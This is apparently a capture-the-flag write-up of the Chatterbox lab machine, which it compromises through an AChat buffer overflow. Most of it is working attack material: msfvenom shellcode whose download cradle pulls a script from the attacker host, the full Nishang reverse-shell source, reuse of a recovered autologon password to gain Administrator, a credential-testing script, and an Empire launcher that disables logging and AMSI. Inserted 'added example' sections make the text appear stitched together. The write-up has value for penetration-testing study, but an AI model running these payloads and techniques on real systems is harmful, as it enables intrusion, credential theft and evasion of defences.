This has been one of the most complex boxes I have done, mostly because I don't have that much experience with Windows.

As always, we start with Nmap; here only the two open ports are rescanned with default scripts and version detection:

root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST
Nmap scan report for 10.10.10.74
Host is up (0.33s latency).

PORT 	STATE SERVICE VERSION
9255/tcp open  http	AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

Since there are only two ports and the entry point is AChat, we look it up in searchsploit:

root@Kali2:~# searchsploit achat
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        	|  Path
                                                                                                                                                                      	| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                                                                            	| exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                                                                               	| exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                  	| exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                                                                    	| exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We can use MSF or do it by hand. Since this is OSCP preparation, it will be by hand.

We copy the exploit to the working directory:

searchsploit -m 36025

From here on, two things in the script need changing: the target address (10.10.10.74) and the payload.

For the payload we want the target to connect back to us and fetch a Nishang reverse shell over HTTP (served with Python's SimpleHTTPServer). Obviously the IP and port inside that script must be adjusted to your own, and a listener must already be waiting.

root@Kali2:~/Desktop# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/powershellreverse.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 670 (iteration=0)
x86/unicode_mixed chosen with final size 670
Payload size: 670 bytes
Final size of python file: 3210 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x77\x78\x75\x32"
buf += "\x69\x70\x39\x70\x39\x70\x53\x30\x64\x49\x47\x75\x6c"
buf += "\x71\x67\x50\x43\x34\x64\x4b\x70\x50\x70\x30\x42\x6b"
buf += "\x70\x52\x7a\x6c\x54\x4b\x71\x42\x6d\x44\x62\x6b\x72"
buf += "\x52\x4c\x68\x6c\x4f\x75\x67\x4f\x5a\x4f\x36\x6c\x71"
buf += "\x39\x6f\x76\x4c\x4d\x6c\x63\x31\x51\x6c\x79\x72\x4e"
buf += "\x4c\x6f\x30\x55\x71\x66\x6f\x5a\x6d\x39\x71\x48\x47"
buf += "\x48\x62\x5a\x52\x4f\x62\x50\x57\x42\x6b\x72\x32\x5a"
buf += "\x70\x44\x4b\x30\x4a\x4f\x4c\x34\x4b\x30\x4c\x4b\x61"
buf += "\x31\x68\x37\x73\x4e\x68\x4a\x61\x56\x71\x30\x51\x32"
buf += "\x6b\x4f\x69\x4f\x30\x5a\x61\x38\x53\x54\x4b\x6f\x59"
buf += "\x4c\x58\x69\x53\x4e\x5a\x30\x49\x54\x4b\x6e\x54\x34"
buf += "\x4b\x6a\x61\x66\x76\x4d\x61\x49\x6f\x36\x4c\x66\x61"
buf += "\x66\x6f\x4c\x4d\x69\x71\x75\x77\x6f\x48\x67\x70\x63"
buf += "\x45\x6c\x36\x39\x73\x73\x4d\x69\x68\x4f\x4b\x43\x4d"
buf += "\x4c\x64\x30\x75\x69\x54\x71\x48\x74\x4b\x70\x58\x6d"
buf += "\x54\x79\x71\x56\x73\x43\x36\x54\x4b\x4a\x6c\x4e\x6b"
buf += "\x62\x6b\x32\x38\x6d\x4c\x6b\x51\x76\x73\x72\x6b\x6d"
buf += "\x34\x44\x4b\x4b\x51\x56\x70\x71\x79\x4d\x74\x6c\x64"
buf += "\x6c\x64\x51\x4b\x61\x4b\x71\x51\x70\x59\x6e\x7a\x50"
buf += "\x51\x4b\x4f\x47\x70\x31\x4f\x31\x4f\x4f\x6a\x74\x4b"
buf += "\x5a\x72\x38\x6b\x62\x6d\x31\x4d\x71\x5a\x4d\x31\x34"
buf += "\x4d\x53\x55\x68\x32\x39\x70\x79\x70\x39\x70\x42\x30"
buf += "\x62\x48\x6e\x51\x72\x6b\x72\x4f\x32\x67\x49\x6f\x37"
buf += "\x65\x75\x6b\x6a\x50\x65\x65\x66\x42\x31\x46\x70\x68"
buf += "\x43\x76\x62\x75\x75\x6d\x55\x4d\x59\x6f\x76\x75\x6d"
buf += "\x6c\x4c\x46\x51\x6c\x6b\x5a\x45\x30\x39\x6b\x57\x70"
buf += "\x63\x45\x69\x75\x75\x6b\x71\x37\x4e\x33\x64\x32\x50"
buf += "\x6f\x52\x4a\x69\x70\x42\x33\x4b\x4f\x7a\x35\x54\x30"
buf += "\x52\x4f\x73\x47\x33\x35\x30\x72\x51\x63\x31\x58\x4f"
buf += "\x75\x50\x6c\x30\x6c\x4b\x70\x4f\x32\x30\x49\x50\x45"
buf += "\x72\x38\x4f\x38\x70\x4e\x42\x45\x52\x57\x6e\x4d\x30"
buf += "\x4f\x62\x42\x70\x6a\x63\x35\x72\x43\x74\x34\x6f\x30"
buf += "\x50\x4e\x51\x55\x32\x54\x6c\x6e\x30\x57\x30\x65\x70"
buf += "\x62\x4f\x53\x30\x6c\x43\x39\x72\x45\x72\x4e\x30\x74"
buf += "\x4d\x59\x4c\x6e\x61\x54\x62\x4f\x31\x67\x50\x6e\x70"
buf += "\x6c\x72\x4f\x33\x31\x62\x44\x72\x33\x44\x34\x54\x32"
buf += "\x53\x39\x32\x4e\x43\x37\x4f\x38\x4b\x77\x6f\x78\x73"
buf += "\x44\x33\x44\x34\x30\x6f\x4a\x6c\x6f\x4c\x6f\x6f\x4c"
buf += "\x30\x4c\x6f\x51\x70\x42\x61\x39\x30\x50\x4d\x6e\x4c"
buf += "\x6f\x44\x37\x34\x32\x33\x39\x61\x64\x4f\x75\x53\x45"
buf += "\x62\x50\x6c\x6e\x54\x30\x30\x73\x70\x31\x4b\x77\x6d"
buf += "\x59\x4d\x52\x6d\x30\x41\x41"

We paste this into the exploit, replacing its buf.
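Why the encoder and the bad-character list look the way they do, as an added example that is not part of the original post: the vulnerable copy in AChat operates on the message after a narrow-to-wide (UTF-16) conversion, so only bytes that come out of that conversion as a single code unit with a zero high byte are usable. 0x00 terminates the string, and bytes from 0x80 upwards are mapped through the target's ANSI code page (0x80 becomes U+20AC under code page 1252, for instance), which is why the exploit bans all of them and msfvenom is told to emit a unicode_mixed payload that decodes itself in place; BufferRegister=EAX tells the encoder that the exploit leaves EAX pointing at the payload when the decoder runs. The PowerShell below is my own helper, run on the attacking machine rather than on the target: it parses msfvenom's python output, flags every byte that breaks these rules and checks the length against a cap. The sample input is constructed (two lines from the payload above plus one deliberately bad line), the 1152-byte cap in the usage line is an assumption, and the code page used for the expansion demo (1252) is likewise assumed; take the real limit from the exploit's header comment.

```powershell
# Added example, not part of the original post: sanity-check an msfvenom
# python-format payload against the AChat constraints before pasting it
# into 36025.py.

function ConvertFrom-MsfvenomPython {
    # Collect every \xHH escape from msfvenom's 'buf += "..."' lines, in order.
    param([Parameter(Mandatory)][string]$Text)
    $bytes = foreach ($m in [regex]::Matches($Text, '\\x([0-9a-fA-F]{2})')) {
        [Convert]::ToByte($m.Groups[1].Value, 16)
    }
    return [byte[]]$bytes
}

function Test-AchatPayload {
    # Report the payload length and every offset holding a byte the target
    # cannot carry: NUL (string terminator) and anything >= 0x80, which does
    # not reliably survive the narrow-to-wide conversion as an "xx 00" unit.
    param([Parameter(Mandatory)][byte[]]$Payload,
          [Parameter(Mandatory)][int]$MaxLength)
    $badOffsets = @(for ($i = 0; $i -lt $Payload.Length; $i++) {
        if ($Payload[$i] -eq 0 -or $Payload[$i] -ge 0x80) { $i }
    })
    [pscustomobject]@{
        Length     = $Payload.Length
        Fits       = ($Payload.Length -le $MaxLength)
        BadOffsets = $badOffsets
        Ok         = ($badOffsets.Count -eq 0) -and ($Payload.Length -le $MaxLength)
    }
}

function Show-Utf16Expansion {
    # Show what each narrow byte becomes after the widening step. Code page
    # 1252 is assumed here; on the real target the ANSI code page decides it,
    # which is exactly why the exploit treats every byte >= 0x80 as bad.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ('System.Text.CodePagesEncodingProvider' -as [type]) {
        [Text.Encoding]::RegisterProvider([Text.CodePagesEncodingProvider]::Instance)
    }
    $ansi = [Text.Encoding]::GetEncoding(1252)
    foreach ($b in $Bytes) {
        $wide = [Text.Encoding]::Unicode.GetBytes($ansi.GetString([byte[]]@($b)))
        '{0:x2} -> {1}' -f $b, (($wide | ForEach-Object { '{0:x2}' -f $_ }) -join ' ')
    }
}

# Constructed sample: the first two lines of the payload shown above, plus a
# third line that deliberately contains a NUL and two high bytes.
$sample = @'
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x00\xe9\x80"
'@

$payload = ConvertFrom-MsfvenomPython -Text $sample
# 1152 is an assumed cap; read the real limit from the exploit's header comment.
Test-AchatPayload -Payload $payload -MaxLength 1152
# 0x41 widens cleanly to "41 00"; 0x80 becomes "ac 20" under 1252 and is unusable.
Show-Utf16Expansion -Bytes ([byte[]](0x41, 0x80, 0xe9))
```

Run it against the full msfvenom output (paste the whole buf block into $sample) before touching the exploit: a non-empty BadOffsets means the encoder run has to be repeated with the bad-character list intact, and Fits being false means the payload has to be slimmed (a shorter CMD, or a staged download like the one used here) rather than trimmed by hand.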

For the shell we take Invoke-PowerShellTcp.ps1 from the Nishang GitHub repository and append one last line that calls the function, so the script connects back as soon as IEX executes the download:

function Invoke-PowerShellTcp 
{ 
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
the given IP and port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port. 

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>      
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 1234

We run the exploit:

root@Kali2:~/Desktop# python 36025.py
---->{P00F}!

And we have our user shell on the listener:

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49167
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\alfred

We run PowerUp's Invoke-AllChecks (same trick as the reverse shell: PowerUp.ps1 with an Invoke-AllChecks call appended at the end, served over HTTP):

PS C:\Windows\system32> IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/PowerUpAllchecks.ps1')

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...


[*] Checking %PATH% for potentially hijackable DLL locations...


[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


DefaultDomainName	:
DefaultUserName  	: Alfred
DefaultPassword  	: Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

Autologon credentials for Alfred, stored in clear text in the registry. We will try to reuse them, so first we list the local users:

PS C:\Windows\system32> net users

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator        	Alfred               	Guest               	 
The command completed successfully.

Now we launch the same reverse shell, in a copy with the port changed to 1235 (powershellreverse2.ps1), as Administrator. Start-Process -Credential starts the new PowerShell under the other account; its output does not come back through our current socket, which is why it calls back to a second listener instead:

PS C:\Windows\system32> $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object System.Management.Automation.PSCredential('Administrator',$passwd)
PS C:\Windows\system32> $creds

UserName                                                           	Password
--------                                                           	--------
Administrator                                  	System.Security.SecureString

PS C:\Windows\system32> Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse2.ps1')" -Credential $creds

And we are in:

root@Kali2:~/Desktop# nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49175
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\administrator
PS C:\Windows\system32>
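The same privilege escalation done by hand, as an added example that is not part of the original post: it reads the Winlogon autologon values that PowerUp reported, then tries the recovered password against every other enabled local account using Start-Process -Credential, which fails with a logon error when the password is wrong. Assumptions: it runs inside the low-privilege shell on the target (a Windows 7 era host, so it uses Get-WmiObject rather than Get-LocalUser and avoids PowerShell 3 syntax), cmd.exe /c exit serves as the throw-away process, and the Secondary Logon service is running (Start-Process -Credential depends on it). As with the Start-Process step above, the spawned process has no console attached to our socket; only the success or failure of the launch is used here.

```powershell
# Added example, not from the original post. Run in the low-privilege shell
# on the target: read the Winlogon autologon values by hand, then test the
# password against every other enabled local account.

function Get-AutologonCredential {
    # Winlogon keeps autologon credentials in clear text under this key;
    # it is the same location PowerUp's autologon check reads.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction Stop
    if (-not $p.DefaultPassword) { return $null }
    New-Object PSObject -Property @{
        Domain         = $p.DefaultDomainName
        UserName       = $p.DefaultUserName
        Password       = $p.DefaultPassword
        AutoAdminLogon = $p.AutoAdminLogon
    }
}

function Test-LocalCredential {
    # Launch a throw-away process as the user. A wrong password makes
    # Start-Process -Credential fail with a logon error, so the exception is
    # the verdict; no network service is needed. Requires the Secondary
    # Logon service (seclogon) to be running.
    param([string]$UserName, [string]$Password)
    $secure = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential("$env:COMPUTERNAME\$UserName", $secure)
    try {
        Start-Process -FilePath 'cmd.exe' -ArgumentList '/c exit' -Credential $cred -WindowStyle Hidden -Wait -ErrorAction Stop
        return $true
    } catch {
        return $false
    }
}

$auto = Get-AutologonCredential
if ($auto -eq $null) { 'No autologon password set'; return }
$dom = if ($auto.Domain) { $auto.Domain } else { $env:COMPUTERNAME }
'Autologon: {0}\{1} / {2}' -f $dom, $auto.UserName, $auto.Password

# Every enabled local account except the autologon user itself.
$others = Get-WmiObject -Class Win32_UserAccount -Filter 'LocalAccount=True' |
    Where-Object { -not $_.Disabled -and $_.Name -ne $auto.UserName }

foreach ($u in $others) {
    if (Test-LocalCredential -UserName $u.Name -Password $auto.Password) {
        '{0,-16} VALID: password is reused' -f $u.Name
    } else {
        '{0,-16} no' -f $u.Name
    }
}
```

On this box the loop reports Administrator as VALID and skips Guest because it is disabled; from there the Start-Process call shown above, with the second reverse shell as the argument, is all that is left to do.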

As an alternative we can use Empire. First we start a listener and get the PowerShell launcher the agent will run; BindIP, Port and Host have to be set to our own address (10.10.14.26:443 below).

git clone https://github.com/EmpireProject/Empire
cd Empire/setup
./install.sh
cd ..
./empire
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______	__  .______   	_______
  |   ____||   \/   | |   _  \  |  | |   _  \ 	|   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |	|  |__
  |   __|  |  |\/|  | |   ___/  |  | |  	/ 	|   __|
  |  |____ |  |  |  | |  |  	|  | |  |\  \----.|  |____
  |_______||__|  |__| | _|  	|__| | _| `._____||_______|



(Empire) > listeners
(Empire: listeners) > uselistener
dbx       	http      	http_com  	http_foreign  http_hop  	http_mapi 	meterpreter   onedrive  	redirector    
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

	Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name          	Required	Value                        	Description
  ----          	--------	-------                      	-----------
  SlackToken    	False                                    	Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds    	False   	default                      	Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate      	False                                    	Date for the listener to exit (MM/dd/yyyy).
  Name          	True    	http                         	Name for the listener.
  Launcher      	True    	powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay  	True    	5                            	Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True    	60                           	Number of missed checkins before exiting
  WorkingHours  	False                                    	Hours for the agent to operate (09:00-17:00).
  SlackChannel  	False   	#general                     	The Slack channel or DM that notifications will be sent to.
  DefaultProfile	True    	/admin/get.php,/news.php,/login/ Default communication profile for the agent.
                            	process.php|Mozilla/5.0 (Windows
                            	NT 6.1; WOW64; Trident/7.0;
                            	rv:11.0) like Gecko
  Host          	True    	http://10.10.14.26:443       	Hostname/IP for staging.
  CertPath      	False                                    	Certificate path for https listeners.
  DefaultJitter 	True    	0.0                          	Jitter in agent reachback interval (0.0-1.0).
  Proxy         	False   	default                      	Proxy to use for request (default, none, or other).
  UserAgent     	False   	default                      	User-agent string to use for the staging request (default, none, or other).
  StagingKey    	True    	>yn+5G)k*%.8-b4BFZCS;~3c9,aX(wf< Staging key for initial agent negotiation.
  BindIP        	True    	10.10.14.26                  	The IP to bind to on the control server.
  Port          	True    	443                          	Port for the listener.
  ServerVersion 	True    	Microsoft-IIS/7.5            	Server header for the control server.
  StagerURI     	False                                    	URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) >
agents 	back   	creds  	execute	exit   	help   	info   	launcher   listeners  main   	resource   set    	unset 	 
(Empire: listeners/http) > launcher
[!] Please enter 'launcher <language>'
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc  <base64 launcher, reproduced in full below>
(Empire: listeners/http) >

We copy the whole launcher and use it as the contents of the script our payload downloads, in place of the Nishang reverse shell. Decoded, it is Empire's standard stager: it disables ScriptBlock logging, sets AmsiUtils.amsiInitFailed, then fetches /news.php from http://10.10.14.26:443 with a fixed User-Agent and session cookie, RC4-decrypts the response with the staging key from the listener options and pipes the result into IEX. Worth remembering on the defensive side, since every one of those steps is a detection opportunity.

powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAG8ATABsAEUAQwBUAEkAbwBOAHMALgBHAGUAbgBlAHIAaQBjAC4ARABpAEMAdABJAE8AbgBBAFIAeQBbAFMAVAByAEkATgBnACwAUwB5AFMAdABlAE0ALgBPAEIASgBlAGMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIAbABvAGMASwBdAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAEwAdQBlACgAJABuAFUATABsACwAKABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAQwBvAGwATABFAGMAVABpAE8AbgBzAC4A
RwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAkAHQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFMAZQBSAFYASQBjAEUAUABPAEkATgB0AE0AQQBuAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AdABJAG4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBTAHQARQBNAC4ATgBlAHQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgAZQBhAEQAZQByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAeQA9AFsAUwB5AHMAVABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBxAFUAZQBTAHQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwB4AHkAOwAkAFcAYwAuAFAAcgBvAHgAWQAuAEMAcgBlAGQARQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBDAHIARQBEAGUAbgBUAGkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4ARQB0AHcAbwBSAEsAQwByAEUAZABlAG4AVABJAEEA